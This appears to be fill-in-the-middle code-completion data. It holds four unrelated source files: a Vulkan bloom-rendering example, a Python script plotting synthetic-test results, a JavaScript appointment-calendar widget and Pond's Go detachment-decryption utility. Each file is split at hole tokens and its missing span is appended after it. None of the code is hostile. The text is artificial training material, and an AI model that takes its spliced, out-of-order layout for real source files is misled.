vkTools::initializers::writeDescriptorSet(descriptorSets.skyBox, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, &textures.cubemap.descriptor), }; vkUpdateDescriptorSets(device, writeDescriptorSets.size(), writeDescriptorSets.data(), 0, NULL); } void preparePipelines() { VkPipelineInputAssemblyStateCreateInfo inputAssemblyState = vkTools::initializers::pipelineInputAssemblyStateCreateInfo( VK_PRIMITIVE_TOPOLOGY_TRIANGLE_LIST, 0, VK_FALSE); VkPipelineRasterizationStateCreateInfo rasterizationState = vkTools::initializers::pipelineRasterizationStateCreateInfo( VK_POLYGON_MODE_FILL, VK_CULL_MODE_NONE, VK_FRONT_FACE_CLOCKWISE, 0); VkPipelineColorBlendAttachmentState blendAttachmentState = vkTools::initializers::pipelineColorBlendAttachmentState( 0xf, VK_FALSE); VkPipelineColorBlendStateCreateInfo colorBlendState = vkTools::initializers::pipelineColorBlendStateCreateInfo( 1, &blendAttachmentState); VkPipelineDepthStencilStateCreateInfo depthStencilState = vkTools::initializers::pipelineDepthStencilStateCreateInfo( VK_TRUE, VK_TRUE, VK_COMPARE_OP_LESS_OR_EQUAL); VkPipelineViewportStateCreateInfo viewportState = vkTools::initializers::pipelineViewportStateCreateInfo(1, 1, 0); VkPipelineMultisampleStateCreateInfo multisampleState = vkTools::initializers::pipelineMultisampleStateCreateInfo( VK_SAMPLE_COUNT_1_BIT, 0); std::vector<VkDynamicState> dynamicStateEnables = { VK_DYNAMIC_STATE_VIEWPORT, VK_DYNAMIC_STATE_SCISSOR }; VkPipelineDynamicStateCreateInfo dynamicState = vkTools::initializers::pipelineDynamicStateCreateInfo( dynamicStateEnables.data(), dynamicStateEnables.size(), 0); std::array<VkPipelineShaderStageCreateInfo, 2> shaderStages; // Vertical gauss blur // Load shaders shaderStages[0] = loadShader(getAssetPath() + "shaders/bloom/gaussblur.vert.spv", VK_SHADER_STAGE_VERTEX_BIT); shaderStages[1] = loadShader(getAssetPath() + "shaders/bloom/gaussblur.frag.spv", VK_SHADER_STAGE_FRAGMENT_BIT); VkGraphicsPipelineCreateInfo pipelineCreateInfo = vkTools::initializers::pipelineCreateInfo( pipelineLayout, renderPass, 0); pipelineCreateInfo.pVertexInputState = &vertices.inputState; pipelineCreateInfo.pInputAssemblyState = &inputAssemblyState; pipelineCreateInfo.pRasterizationState = &rasterizationState; pipelineCreateInfo.pColorBlendState = &colorBlendState; pipelineCreateInfo.pMultisampleState = &multisampleState; pipelineCreateInfo.pViewportState = &viewportState; pipelineCreateInfo.pDepthStencilState = &depthStencilState; pipelineCreateInfo.pDynamicState = &dynamicState; pipelineCreateInfo.stageCount = shaderStages.size(); pipelineCreateInfo.pStages = shaderStages.data(); // Additive blending blendAttachmentState.colorWriteMask = 0xF; blendAttachmentState.blendEnable = VK_TRUE; blendAttachmentState.colorBlendOp = VK_BLEND_OP_ADD; blendAttachmentState.srcColorBlendFactor = VK_BLEND_FACTOR_ONE; blendAttachmentState.dstColorBlendFactor = VK_BLEND_FACTOR_ONE; blendAttachmentState.alphaBlendOp = VK_BLEND_OP_ADD; blendAttachmentState.srcAlphaBlendFactor = VK_BLEND_FACTOR_SRC_ALPHA; blendAttachmentState.dstAlphaBlendFactor = VK_BLEND_FACTOR_DST_ALPHA; pipelineCreateInfo.renderPass = offscreenPass.renderPass; VK_CHECK_RESULT(vkCreateGraphicsPipelines(device, pipelineCache, 1, &pipelineCreateInfo, nullptr, &pipelines.blurVert)); pipelineCreateInfo.renderPass = renderPass; VK_CHECK_RESULT(vkCreateGraphicsPipelines(device, pipelineCache, 1, &pipelineCreateInfo, nullptr, &pipelines.blurHorz)); // Phong pass (3D model) shaderStages[0] = loadShader(getAssetPath() + "shaders/bloom/phongpass.vert.spv", VK_SHADER_STAGE_VERTEX_BIT); shaderStages[1] = loadShader(getAssetPath() + "shaders/bloom/phongpass.frag.spv", VK_SHADER_STAGE_FRAGMENT_BIT); blendAttachmentState.blendEnable = VK_FALSE; depthStencilState.depthWriteEnable = VK_TRUE; rasterizationState.cullMode = VK_CULL_MODE_BACK_BIT; pipelineCreateInfo.renderPass = renderPass; VK_CHECK_RESULT(vkCreateGraphicsPipelines(device, pipelineCache, 1, &pipelineCreateInfo, nullptr, &pipelines.phongPass)); // Color only pass (offscreen blur base) shaderStages[0] = loadShader(getAssetPath() + "shaders/bloom/colorpass.vert.spv", VK_SHADER_STAGE_VERTEX_BIT); shaderStages[1] = loadShader(getAssetPath() + "shaders/bloom/colorpass.frag.spv", VK_SHADER_STAGE_FRAGMENT_BIT); pipelineCreateInfo.renderPass = offscreenPass.renderPass; VK_CHECK_RESULT(vkCreateGraphicsPipelines(device, pipelineCache, 1, &pipelineCreateInfo, nullptr, &pipelines.glowPass)); // Skybox (cubemap) shaderStages[0] = loadShader(getAssetPath() + "shaders/bloom/skybox.vert.spv", VK_SHADER_STAGE_VERTEX_BIT); shaderStages[1] = loadShader(getAssetPath() + "shaders/bloom/skybox.frag.spv", VK_SHADER_STAGE_FRAGMENT_BIT); depthStencilState.depthWriteEnable = VK_FALSE; rasterizationState.cullMode = VK_CULL_MODE_FRONT_BIT; pipelineCreateInfo.renderPass = renderPass; VK_CHECK_RESULT(vkCreateGraphicsPipelines(device, pipelineCache, 1, &pipelineCreateInfo, nullptr, &pipelines.skyBox)); } // Prepare and initialize uniform buffer containing shader uniforms void prepareUniformBuffers() { // Phong and color pass vertex shader uniform buffer createBuffer( VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, sizeof(ubos.scene), &ubos.scene, &uniformData.vsScene.buffer, &uniformData.vsScene.memory, &uniformData.vsScene.descriptor); // Fullscreen quad display vertex shader uniform buffer createBuffer( VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, sizeof(ubos.fullscreen), &ubos.fullscreen, &uniformData.vsFullScreen.buffer, &uniformData.vsFullScreen.memory, &uniformData.vsFullScreen.descriptor); // Fullscreen quad fragment shader uniform buffers // Vertical blur createBuffer( VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, sizeof(ubos.vertBlur), &ubos.vertBlur, &uniformData.fsVertBlur.buffer, &uniformData.fsVertBlur.memory, &uniformData.fsVertBlur.descriptor); // Horizontal blur createBuffer( VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, sizeof(ubos.horzBlur), &ubos.horzBlur, &uniformData.fsHorzBlur.buffer, &uniformData.fsHorzBlur.memory, &uniformData.fsHorzBlur.descriptor); // Skybox createBuffer( VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, sizeof(ubos.skyBox), &ubos.skyBox, &uniformData.vsSkyBox.buffer, &uniformData.vsSkyBox.memory, &uniformData.vsSkyBox.descriptor); // Intialize uniform buffers updateUniformBuffersScene(); updateUniformBuffersScreen(); } // Update uniform buffers for rendering the 3D scene void updateUniformBuffersScene() { // UFO ubos.fullscreen.projection = glm::perspective(glm::radians(45.0f), (float)width / (float)height, 0.1f, 256.0f); glm::mat4 viewMatrix = glm::translate(glm::mat4(), glm::vec3(0.0f, -1.0f, zoom)); ubos.fullscreen.model = viewMatrix * glm::translate(glm::mat4(), glm::vec3(sin(glm::radians(timer * 360.0f)) * 0.25f, 0.0f, cos(glm::radians(timer * 360.0f)) * 0.25f) + cameraPos); ubos.fullscreen.model = glm::rotate(ubos.fullscreen.model, glm::radians(rotation.x), glm::vec3(1.0f, 0.0f, 0.0f)); ubos.fullscreen.model = glm::rotate(ubos.fullscreen.model, -sinf(glm::radians(timer * 360.0f)) * 0.15f, glm::vec3(1.0f, 0.0f, 0.0f)); ubos.fullscreen.model = glm::rotate(ubos.fullscreen.model, glm::radians(rotation.y), glm::vec3(0.0f, 1.0f, 0.0f)); ubos.fullscreen.model = glm::rotate(ubos.fullscreen.model, glm::radians(timer * 360.0f), glm::vec3(0.0f, 1.0f, 0.0f)); ubos.fullscreen.model = glm::rotate(ubos.fullscreen.model, glm::radians(rotation.z), glm::vec3(0.0f, 0.0f, 1.0f)); uint8_t *pData; VK_CHECK_RESULT(vkMapMemory(device, uniformData.vsFullScreen.memory, 0, sizeof(ubos.fullscreen), 0, (void **)&pData)); memcpy(pData, &ubos.fullscreen, sizeof(ubos.fullscreen)); vkUnmapMemory(device, uniformData.vsFullScreen.memory); // Skybox ubos.skyBox.projection = glm::perspective(glm::radians(45.0f), (float)width / (float)height, 0.1f, 256.0f); ubos.skyBox.model = glm::mat4(); ubos.skyBox.model = glm::rotate(ubos.skyBox.model, glm::radians(rotation.x), glm::vec3(1.0f, 0.0f, 0.0f)); ubos.skyBox.model = glm::rotate(ubos.skyBox.model, glm::radians(rotation.y), glm::vec3(0.0f, 1.0f, 0.0f)); ubos.skyBox.model = glm::rotate(ubos.skyBox.model, glm::radians(rotation.z), glm::vec3(0.0f, 0.0f, 1.0f)); VK_CHECK_RESULT(vkMapMemory(device, uniformData.vsSkyBox.memory, 0, sizeof(ubos.skyBox), 0, (void **)&pData)); memcpy(pData, &ubos.skyBox, sizeof(ubos.skyBox)); vkUnmapMemory(device, uniformData.vsSkyBox.memory); } // Update uniform buffers for the fullscreen quad void updateUniformBuffersScreen() { // Vertex shader ubos.scene.projection = glm::ortho(0.0f, 1.0f, 0.0f, 1.0f, -1.0f, 1.0f); ubos.scene.model = glm::mat4(); uint8_t *pData; VK_CHECK_RESULT(vkMapMemory(device, uniformData.vsScene.memory, 0, sizeof(ubos.scene), 0, (void **)&pData)); memcpy(pData, &ubos.scene, sizeof(ubos.scene)); vkUnmapMemory(device, uniformData.vsScene.memory); // Fragment shader // Vertical<|fim▁hole|> memcpy(pData, &ubos.vertBlur, sizeof(ubos.vertBlur)); vkUnmapMemory(device, uniformData.fsVertBlur.memory); // Horizontal ubos.horzBlur.horizontal = 1; VK_CHECK_RESULT(vkMapMemory(device, uniformData.fsHorzBlur.memory, 0, sizeof(ubos.horzBlur), 0, (void **)&pData)); memcpy(pData, &ubos.horzBlur, sizeof(ubos.horzBlur)); vkUnmapMemory(device, uniformData.fsHorzBlur.memory); } void draw() { VulkanExampleBase::prepareFrame(); // The scene render command buffer has to wait for the offscreen rendering to be finished before we can use the framebuffer // color image for sampling during final rendering // To ensure this we use a dedicated offscreen synchronization semaphore that will be signaled when offscreen rendering has been finished // This is necessary as an implementation may start both command buffers at the same time, there is no guarantee // that command buffers will be executed in the order they have been submitted by the application // Offscreen rendering // Wait for swap chain presentation to finish submitInfo.pWaitSemaphores = &semaphores.presentComplete; // Signal ready with offscreen semaphore submitInfo.pSignalSemaphores = &offscreenPass.semaphore; // Submit work submitInfo.commandBufferCount = 1; submitInfo.pCommandBuffers = &offscreenPass.commandBuffer; VK_CHECK_RESULT(vkQueueSubmit(queue, 1, &submitInfo, VK_NULL_HANDLE)); // Scene rendering // Wait for offscreen semaphore submitInfo.pWaitSemaphores = &offscreenPass.semaphore; // Signal ready with render complete semaphpre submitInfo.pSignalSemaphores = &semaphores.renderComplete; // Submit work submitInfo.pCommandBuffers = &drawCmdBuffers[currentBuffer]; VK_CHECK_RESULT(vkQueueSubmit(queue, 1, &submitInfo, VK_NULL_HANDLE)); VulkanExampleBase::submitFrame(); } void prepare() { VulkanExampleBase::prepare(); loadAssets(); generateQuad(); setupVertexDescriptions(); prepareUniformBuffers(); prepareOffscreen(); setupDescriptorSetLayout(); preparePipelines(); setupDescriptorPool(); setupDescriptorSet(); buildCommandBuffers(); prepared = true; } virtual void render() { if (!prepared) return; draw(); if (!paused) { updateUniformBuffersScene(); } } virtual void viewChanged() { updateUniformBuffersScene(); updateUniformBuffersScreen(); } virtual void keyPressed(uint32_t keyCode) { switch (keyCode) { case KEY_KPADD: case GAMEPAD_BUTTON_R1: changeBlurScale(0.25f); break; case KEY_KPSUB: case GAMEPAD_BUTTON_L1: changeBlurScale(-0.25f); break; case KEY_B: case GAMEPAD_BUTTON_A: toggleBloom(); break; } } virtual void getOverlayText(VulkanTextOverlay *textOverlay) { #if defined(__ANDROID__) textOverlay->addText("Press \"L1/R1\" to change blur scale", 5.0f, 85.0f, VulkanTextOverlay::alignLeft); textOverlay->addText("Press \"Button A\" to toggle bloom", 5.0f, 105.0f, VulkanTextOverlay::alignLeft); #else textOverlay->addText("Press \"NUMPAD +/-\" to change blur scale", 5.0f, 85.0f, VulkanTextOverlay::alignLeft); textOverlay->addText("Press \"B\" to toggle bloom", 5.0f, 105.0f, VulkanTextOverlay::alignLeft); #endif } void changeBlurScale(float delta) { ubos.vertBlur.blurScale += delta; ubos.horzBlur.blurScale += delta; updateUniformBuffersScreen(); } void toggleBloom() { bloom = !bloom; reBuildCommandBuffers(); } }; VULKAN_EXAMPLE_MAIN()<|fim▁end|>
ubos.vertBlur.horizontal = 0; VK_CHECK_RESULT(vkMapMemory(device, uniformData.fsVertBlur.memory, 0, sizeof(ubos.vertBlur), 0, (void **)&pData));
<|file_name|>plotynth.py<|end_file_name|><|fim▁begin|>#!/bin/env python # plot results from ynthetictest.py # by Dan Stowell, spring 2013 import os.path import csv from math import log, exp, pi, sqrt, ceil, floor from numpy import mean, std, shape import numpy as np import random import matplotlib.pyplot as plt import matplotlib.cm as cm from mpl_toolkits.mplot3d import Axes3D import itertools #annotdir = os.path.expanduser("~/svn/stored_docs/python/markovrenewal/output") annotdir = "output" plotfontsize = "large" #"xx-small" namelookup = { 'fsn':'Fsn', 'ftrans':'Ftrans', 'fsigtrans':'Fsigtrans', 'msecs':'Run time (msecs)', \ 'birthdens_mism':'Error in assumed birth density (ratio)', 'deathprob_mism':'Error in assumed death probability (ratio)', 'snr_mism':'Error in assumed SNR (dB)', 'gen_mism':'Proportion of errors in transition probabilities', 'misseddetectionprob':'Missed detection probability', 'noisecorr':'Amount of signal correlation imposed on noise', 'snr':'SNR (dB)', 'birthdens':'birth intensity', #'':'', } def readable_name(name): return namelookup.get(name, name) def fmt_chooser(currentcombi, groupcols, groupingvals): fmt = 'k' if groupcols[0]=='mmrpmode' and currentcombi[0]=='greedy': if (len(groupcols)>1) and groupingvals[groupcols[1]].index(currentcombi[1])>0: fmt += ':' else: fmt += '-.' else: if (len(groupcols)>1) and groupingvals[groupcols[1]].index(currentcombi[1])>0: fmt += '--' else: fmt += '-' return fmt def ynth_csv_to_ciplot(csvpath, outpath, groupcols, summarycols, filtercols=None, xjitter=0.): """ groupcols: used for discrete grouping of data, with the first one becoming the x-axis in a plot, remaining ones as multiple lines; summarycols: the name(s) of the columns to be made into y-values. one separate plot will be made for each. filtercols: {key->listofallowed...} select rows only where particular STRING values are found. otherwise, summaries are pooled over all values. """ data = ynth_csv_loaddata(csvpath, groupcols, summarycols, filtercols) # data is {'groupingvals':{ col: list }, 'summarydata':{ tupleofgroupvals: { summarycol:{'mean': _, 'stderr': _} } } } csvname = os.path.splitext(os.path.basename(csvpath))[0] if isinstance(summarycols, basestring): summarycols = [summarycols] if isinstance(groupcols, basestring): groupcols = [groupcols] # one plot for each summarycol for summarycol in summarycols: fig = plt.figure() # Now, we're going to use the first grouper as the x-axis. # This means we want to iterate over all combinations of the other groupers, drawing a line each time. for linegroupcombi in itertools.product(*[data['groupingvals'][col] for col in groupcols[1:]]): linedata = [] for xval in data['groupingvals'][groupcols[0]]: fullgroupcombi = (xval,) + tuple(linegroupcombi) ourdata = data['summarydata'][fullgroupcombi][summarycol] if xjitter != 0: xval += random.gauss(0,xjitter) linedata.append({'xval':xval, 'mean': ourdata['mean'], 'stderr_up': ourdata['stderr'], 'stderr_dn': ourdata['stderr']}) # draw a line linelabel = ', '.join([linegroupcombi[0]] + ["%s %s" % (readable_name(groupcols[lgi+2]), lg) for lgi, lg in enumerate(linegroupcombi[1:])]) plt.errorbar([x['xval'] for x in linedata], \ [x['mean'] for x in linedata], \ ([x['stderr_dn'] for x in linedata], [x['stderr_up'] for x in linedata]), \ label=linelabel, fmt=fmt_chooser(linegroupcombi, groupcols[1:], data['groupingvals'])) #plt.title("%s_%s" % (whichstat, runtype), fontsize=plotfontsize) plt.xlabel(readable_name(groupcols[0]), fontsize=plotfontsize) plt.ylabel(readable_name(summarycol), fontsize=plotfontsize) plt.xticks(data['groupingvals'][groupcols[0]], fontsize=plotfontsize) xdatamax = max(data['groupingvals'][groupcols[0]]) xdatamin = min(data['groupingvals'][groupcols[0]]) plt.xlim(xmin=xdatamin-(xdatamax-xdatamin)*0.05, xmax=xdatamax+(xdatamax-xdatamin)*0.05) #yuck if groupcols[0] in ['deathprob_mism', 'birthdens_mism']: #yuck plt.xscale('log') if summarycol in ['msecs']: plt.yscale('log') else: plt.ylim(ymin=0.2, ymax=1) #rescale(0.3), ymax=rescale(1.001)) #plt.yticks(map(rescale, yticks), yticks, fontsize=plotfontsize) plt.yticks(fontsize=plotfontsize) plt.legend(loc=(0.02, 0.05), prop={'size':'medium'}) outfilepath = "%s/%s_%s.pdf" % (outpath, csvname, summarycol) plt.savefig(outfilepath, papertype='A4', format='pdf') print("Written file %s" % outfilepath) # LATER: consider how to avoid filename collisions - just allow user to specify a lbl? def ynth_csv_to_surfaceplot(csvpath, outpath, groupcols, summarycols, filtercols=None): """ groupcols: used for discrete grouping of data, with the first one becoming the x-axis in a plot, second as y-axis; summarycols: the name(s) of the columns to be made into y-values. one separate plot will be made for each. filtercols: {key->listofallowed...} select rows only where particular STRING values are found. otherwise, summaries are pooled over all values. """ data = ynth_csv_loaddata(csvpath, groupcols, summarycols, filtercols) # data is {'groupingvals':{ col: list }, 'summarydata':{ tupleofgroupvals: { summarycol:{'mean': _, 'stderr': _} } } } csvname = os.path.splitext(os.path.basename(csvpath))[0] if isinstance(summarycols, basestring): summarycols = [summarycols] if isinstance(groupcols, basestring): groupcols = [groupcols] if len(groupcols) != 2: raise ValueError("for surface plot, exactly 2 groupcols must be specified (used as X and Y).") # one plot for each summarycol for summarycol in summarycols: fig = plt.figure() ax = fig.add_subplot(111, projection='3d') # 3D here # NOW DO A SURFACE PLOT data['groupingvals'][groupcols[0]].sort() ydata = map(float, data['groupingvals'][groupcols[1]]) ydata.sort() data['groupingvals'][groupcols[1]].sort(cmp=lambda a,b: cmp(float(a), float(b))) z = [[data['summarydata'][(x,y)][summarycol]['mean'] for x in data['groupingvals'][groupcols[0]]] for y in data['groupingvals'][groupcols[1]]] ymesh = np.array([data['groupingvals'][groupcols[0]] for _ in range(len(data['groupingvals'][groupcols[1]]))]) xmesh = np.array([ydata for _ in range(len(data['groupingvals'][groupcols[0]]))]).T z = np.array(z) ax.plot_surface(xmesh, ymesh, z, rstride=1, cstride=1) """ plt.imshow(z, interpolation='nearest', cmap=cm.binary) """ """ # Now, we're going to use the first grouper as the x-axis. # This means we want to iterate over all combinations of the other groupers, drawing a line each time. for linegroupcombi in itertools.product(*[data['groupingvals'][col] for col in groupcols[1:]]): linedata = [] for xval in data['groupingvals'][groupcols[0]]: fullgroupcombi = (xval,) + tuple(linegroupcombi) ourdata = data['summarydata'][fullgroupcombi][summarycol] if xjitter != 0: xval += random.gauss(0,xjitter) linedata.append({'xval':xval, 'mean': ourdata['mean'], 'stderr_up': ourdata['stderr'], 'stderr_dn': ourdata['stderr']}) # draw a line linelabel = ', '.join([linegroupcombi[0]] + ["%s %s" % (readable_name(groupcols[lgi+2]), lg) for lgi, lg in enumerate(linegroupcombi[1:])]) plt.errorbar([x['xval'] for x in linedata], \ [x['mean'] for x in linedata], \ ([x['stderr_dn'] for x in linedata], [x['stderr_up'] for x in linedata]), \ label=linelabel, fmt=fmt_chooser(linegroupcombi, groupcols[1:], data['groupingvals'])) """ #plt.title("%s_%s" % (whichstat, runtype), fontsize=plotfontsize) """ plt.xlabel(readable_name(groupcols[0]), fontsize=plotfontsize) plt.ylabel(readable_name(groupcols[1]), fontsize=plotfontsize) plt.title(readable_name(summarycol), fontsize=plotfontsize) plt.xticks(range(len(data['groupingvals'][groupcols[0]])), data['groupingvals'][groupcols[0]], fontsize=plotfontsize) plt.yticks(range(len(data['groupingvals'][groupcols[1]])), data['groupingvals'][groupcols[1]], fontsize=plotfontsize) """ """ xdatamax = max(data['groupingvals'][groupcols[0]]) xdatamin = min(data['groupingvals'][groupcols[0]]) plt.xlim(xmin=xdatamin-(xdatamax-xdatamin)*0.05, xmax=xdatamax+(xdatamax-xdatamin)*0.05) ydatamax = max(data['groupingvals'][groupcols[0]]) ydatamin = min(data['groupingvals'][groupcols[0]]) plt.ylim(ymin=ydatamin-(ydatamax-ydatamin)*0.05, ymax=ydatamax+(ydatamax-ydatamin)*0.05) if summarycol in ['msecs']: plt.zscale('log') else: plt.zlim(ymin=0.2, ymax=1) #rescale(0.3), ymax=rescale(1.001)) plt.zticks(fontsize=plotfontsize) #plt.legend(loc=(0.02, 0.05), prop={'size':'medium'}) """ #can't for 3d: plt.colorbar() outfilepath = "%s/%s_%s_surf.pdf" % (outpath, csvname, summarycol) plt.savefig(outfilepath, papertype='A4', format='pdf') print("Written file %s" % outfilepath) def ynth_csv_loaddata(csvpath, groupcols, summarycols, filtercols=None): # load the csv data, applying filtering as we load, and floatifying the summarycols and groupcols # also build up some lists of the values found in the groupcols if isinstance(groupcols, basestring): groupcols = [groupcols] if isinstance(summarycols, basestring): summarycols = [summarycols] rdr = csv.DictReader(open(csvpath, 'rb')) groupingvals = {col:set() for col in groupcols} rawgroupeddata = {} # a dict where a TUPLE of groupedvals maps to a dict containing mean and ci for row in rdr: # filtering skiprow = False if filtercols: for (filtercol, allowedvals) in filtercols.items():<|fim▁hole|> # floatify # CANNOT (eg for mmrpmode): for col in groupcols: row[col] = float(row[col]) row[groupcols[0]] = float(row[groupcols[0]]) for col in summarycols: row[col] = float(row[col]) # record the grouping values for col in groupcols: groupingvals[col].add(row[col]) # and of course store the datum groupindex = tuple(row[col] for col in groupcols) if groupindex not in rawgroupeddata: rawgroupeddata[groupindex] = [] rawgroupeddata[groupindex].append(row) # then construct the summary results: a dict where a TUPLE of groupedvals maps to a dict containing mean and ci summarydata = {} for groupindex, datalist in rawgroupeddata.items(): ourstats = {} for whichsummarycol in summarycols: numlist = [datum[whichsummarycol] for datum in datalist] themean = mean(numlist) stderr = std(numlist) / sqrt(len(numlist)) ourstats[whichsummarycol] = {'mean':themean, 'stderr':stderr} summarydata[groupindex] = ourstats # return the groupcol listing and the big dict of summary data for col in groupcols: groupingvals[col] = list(groupingvals[col]) groupingvals[col].sort() return {'groupingvals':groupingvals, 'summarydata':summarydata} ################################################################################################################ if __name__ == '__main__': # NOTE: filtercols must list string values not floats ynth_csv_to_ciplot("%s/ynth_varying1.csv" % annotdir, "%s/pdf" % annotdir, \ groupcols=['snr', 'mmrpmode', 'birthdens'], summarycols=['fsn', 'fsigtrans', 'msecs'], filtercols=None, xjitter=0.1) #ynth_csv_to_ciplot("%s/ynth_varying100.csv" % annotdir, "%s/pdf" % annotdir, \ # groupcols=['snr', 'mmrpmode', 'birthdens'], summarycols=['fsn', 'fsigtrans', 'msecs'], filtercols=None, xjitter=1.1) ynth_csv_to_ciplot("%s/ynth_sens_snr.csv" % annotdir, "%s/pdf" % annotdir, \ groupcols=['snr_mism', 'mmrpmode' #, 'snr' ], summarycols=['fsn', 'fsigtrans'], filtercols=None) ynth_csv_to_ciplot("%s/ynth_sens_birth.csv" % annotdir, "%s/pdf" % annotdir, \ groupcols=['birthdens_mism', 'mmrpmode'], summarycols=['fsn', 'fsigtrans'], filtercols=None) ynth_csv_to_ciplot("%s/ynth_sens_death.csv" % annotdir, "%s/pdf" % annotdir, \ groupcols=['deathprob_mism', 'mmrpmode'], summarycols=['fsn', 'fsigtrans'], filtercols=None) ynth_csv_to_ciplot("%s/ynth_sens_noisecorr.csv" % annotdir, "%s/pdf" % annotdir, \ groupcols=['noisecorr', 'mmrpmode'], summarycols=['fsn', 'fsigtrans', 'msecs'], filtercols=None) # added msecs to noisecorr since long ynth_csv_to_ciplot("%s/ynth_sens_missed.csv" % annotdir, "%s/pdf" % annotdir, \ groupcols=['misseddetectionprob', 'mmrpmode'], summarycols=['fsn', 'fsigtrans'], filtercols=None) ynth_csv_to_ciplot("%s/ynth_sens_tt.csv" % annotdir, "%s/pdf" % annotdir, \ groupcols=['gen_mism', 'mmrpmode'], summarycols=['fsn', 'fsigtrans'], filtercols=None) # ynth_csv_to_surfaceplot("%s/ynth_sens_snr.csv" % annotdir, "%s/pdf" % annotdir, \ # groupcols=['snr_mism', 'snr'], summarycols=['fsn', 'fsigtrans'], filtercols={'mmrpmode':['full']}) # full inference only<|fim▁end|>
if row[filtercol] not in allowedvals: skiprow = True break if skiprow: continue
<|file_name|>user.js<|end_file_name|><|fim▁begin|>// set event handlers and intialize date var utils = new MedialUtilities(); var week = 0; window.addEventListener('load',function() { document.getElementById('appointment').addEventListener('click', overlayCalendar); document.getElementById('calendar-close').addEventListener('click', closeCalendar); document.getElementById('go-back') && document.getElementById('go-back').addEventListener('click', back); document.getElementById('go-next') && document.getElementById('go-next').addEventListener('click', next); document.getElementById('go-next-cal').addEventListener('click', nextcal); document.getElementById('go-back-cal').addEventListener('click', backcal); }); function overlayCalendar() { newdiv = document.createElement('div'); newdiv.id = 'calendarOverlay'; newdiv.style.width = window.screen.width + 'px'; newdiv.style.height = window.screen.height + 'px'; newdiv.style.position = 'fixed'; newdiv.style.display = 'block'; newdiv.style.background = 'rgba(0,0,0,0.8)'; newdiv.style.zIndex = 9999; newdiv.style.top = 0; document.getElementsByTagName('body')[0].appendChild(newdiv); document.getElementById('calendar').style.zIndex = 99999; document.getElementById('calendar').style.position = 'relative'; document.getElementById('calendar').style.background = 'rgba(255,255,255,1)'; document.getElementById('calendar-close').style.display = 'block'; } function closeCalendar() { document.getElementById('calendarOverlay').remove(); document.getElementById('calendar').style.background = '#F4F7FB'; document.getElementById('calendar-close').style.display = 'none'; }<|fim▁hole|> function back(){if (week == 0) {return false;} else { week -= 1; } if (week >= 0) {getCalendar();}} function next(){if (week == eamax) {return false;} else {week += 1;} if (week <= eamax) {getCalendar();}} function getCalendar() { var params = 'info[user]=' + eauser + '&info[service]=' + easervice + '&info[week]=' + week + '&' + eatoken; var url = earoot + 'index.php?option=com_easyappointment&task=json.getCalendar&tmpl=component'; utils.makeAjaxCall(url,'POST',params,function(msg) { var response = JSON.parse(msg); if (!response.error) { document.getElementById('calendar-table').innerHTML = response.value; } }); } function nextcal() { document.getElementById('calendar-table').scrollLeft+= parseInt(document.getElementById('calendar').clientWidth/3); } function backcal() { document.getElementById('calendar-table').scrollLeft -= parseInt(document.getElementById('calendar').clientWidth/3); }<|fim▁end|>
<|file_name|>decrypt.go<|end_file_name|><|fim▁begin|>// decrypt is a tiny utility that can decrypt Pond detachments given the key // file. The key file can be saved to disk from within the main Pond client. // Later the bulk of the data, transported by other means, can be decrypted // with this utility. (Or the main Pond client itself.) package main import ( "errors" "fmt" "io" "io/ioutil" "os" "code.google.com/p/go.crypto/nacl/secretbox" "code.google.com/p/goprotobuf/proto" pond "github.com/agl/pond/protos" ) func main() { if len(os.Args) != 2 { fmt.Fprintf(os.Stderr, "Usage: %s <key file> < encrypted > decrypted\n", os.Args[0]) os.Exit(1) } if err := do(os.Args[1]); err != nil { fmt.Fprintf(os.Stderr, "%s\n", err) os.Exit(1) } } func do(keyFile string) error { contents, err := ioutil.ReadFile(os.Args[1]) if err != nil { return err } var detachment pond.Message_Detachment<|fim▁hole|> size := detachment.GetSize() paddedSize := detachment.GetPaddedSize() chunkSize := uint64(detachment.GetChunkSize()) blockSize := chunkSize + secretbox.Overhead if blockSize > 1<<20 { return errors.New("chunk size too large") } if paddedSize%blockSize != 0 { return errors.New("padded size is not a multiple of the chunk size") } fmt.Fprintf(os.Stderr, `Pond decryption: Original filename: %s Size: %d Padded size: %d Chunk size: %d `, sanitiseForTerminal(detachment.GetFilename()), size, paddedSize, chunkSize) var key [32]byte var nonce [24]byte copy(key[:], detachment.Key) var read, written uint64 buf := make([]byte, blockSize) var decrypted []byte for read < paddedSize { if _, err := io.ReadFull(os.Stdin, buf); err != nil { return err } read += uint64(len(buf)) var ok bool decrypted, ok := secretbox.Open(decrypted[:0], buf, &nonce, &key) if !ok { return errors.New("decryption error") } incNonce(&nonce) todo := size - written if n := uint64(len(decrypted)); todo > n { todo = n } if _, err := os.Stdout.Write(decrypted[:todo]); err != nil { return err } written += todo } return nil } func incNonce(nonce *[24]byte) { s := 1 for i, b := range nonce[:] { s += int(b) nonce[i] = byte(s) s >>= 8 } } func sanitiseForTerminal(s string) string { var out []rune for _, r := range s { if r < 32 { r = ' ' } out = append(out, r) } return string(out) }<|fim▁end|>
if err := proto.Unmarshal(contents, &detachment); err != nil { return err }